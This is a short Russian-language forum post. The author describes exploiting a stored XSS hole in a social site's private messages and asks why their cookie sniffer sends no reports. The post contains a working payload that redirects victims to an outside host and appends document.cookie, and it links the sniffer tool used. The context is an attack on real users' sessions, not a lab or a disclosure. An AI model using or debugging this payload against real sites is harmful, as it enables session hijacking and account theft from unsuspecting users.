Нашел сайт, на котором в поле личных сообщений(социалка) выполняется html код, а следовательно и javascript
Недолго думая залил xss снифер на хост, составил ссылку
<script>window.location.href='http://htos.ru/sniffer/s.gif?'+document.cookie;</script>

проверил ссылку на лок. компутере - работает, средиректил на настоящую фотографию.
начал тестировать на сайте - пошли первые рога.
Отчеты не приходят, хотя скрипт съедает чисто.

Как это лечится?
Снифер брал с http://pashkela.narod.ru/sniffer.rar